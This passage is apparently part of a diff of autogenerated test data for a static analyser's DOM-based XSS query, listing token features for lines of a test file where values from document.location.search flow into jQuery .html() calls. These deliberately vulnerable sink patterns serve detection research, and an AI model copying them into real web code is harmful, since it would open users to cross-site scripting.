$ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:394:10:394:12 | sub | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:394:10:394:12 | sub | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:394:14:394:19 | taint4 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:394:14:394:19 | taint4 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:394:14:394:19 | taint4 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:394:14:394:19 | taint4 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:394:14:394:19 | taint4 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:394:23:394:23 | 2 | assignedToPropName | taint4 | +| autogenerated/Xss/DomBasedXss/tst.js:394:23:394:23 | 2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:394:23:394:23 | 2 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:394:23:394:23 | 2 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:394:23:394:23 | 2 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:394:23:394:23 | 2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:3 | $ | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:11 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:11 | $('myId') | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:11 | $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:11 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:11 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:11 | exceptional return of $('myId') | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:11 | exceptional return of $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:11 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:16 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:16 | $('myId').html | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:16 | $('myId').html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:16 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:35 | $('myId ... taint4) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:35 | $('myId ... taint4) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:35 | $('myId ... taint4) | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:35 | $('myId ... taint4) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:35 | $('myId ... taint4) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:35 | exceptional return of $('myId ... taint4) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:35 | exceptional return of $('myId ... taint4) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:35 | exceptional return of $('myId ... taint4) | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:35 | exceptional return of $('myId ... taint4) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:395:3:395:35 | exceptional return of $('myId ... taint4) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:395:5:395:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:395:5:395:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:395:5:395:10 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17443,6 +121320,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:395:5:395:10 | 'myId' | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | | autogenerated/Xss/DomBasedXss/tst.js:395:5:395:10 | 'myId' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:395:5:395:10 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:395:13:395:16 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:395:13:395:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:395:13:395:16 | html | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:395:13:395:16 | html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:395:13:395:16 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:395:18:395:23 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:395:18:395:23 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:395:18:395:23 | target | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:395:18:395:23 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:395:18:395:23 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:395:18:395:27 | target.sub | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:395:18:395:27 | target.sub | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:395:18:395:27 | target.sub | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:395:18:395:27 | target.sub | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:395:18:395:27 | target.sub | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:395:18:395:34 | target.sub.taint4 | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:395:18:395:34 | target.sub.taint4 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:395:18:395:34 | target.sub.taint4 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17450,6 +121342,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:395:18:395:34 | target.sub.taint4 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | | autogenerated/Xss/DomBasedXss/tst.js:395:18:395:34 | target.sub.taint4 | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:395:18:395:34 | target.sub.taint4 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:395:25:395:27 | sub | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:395:25:395:27 | sub | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:395:25:395:27 | sub | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:395:25:395:27 | sub | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:395:25:395:27 | sub | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:395:29:395:34 | taint4 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:395:29:395:34 | taint4 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:395:29:395:34 | taint4 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:395:29:395:34 | taint4 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:395:29:395:34 | taint4 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:3 | $ | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:11 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:11 | $('myId') | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:11 | $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:11 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:11 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:11 | exceptional return of $('myId') | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:11 | exceptional return of $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:11 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:16 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, 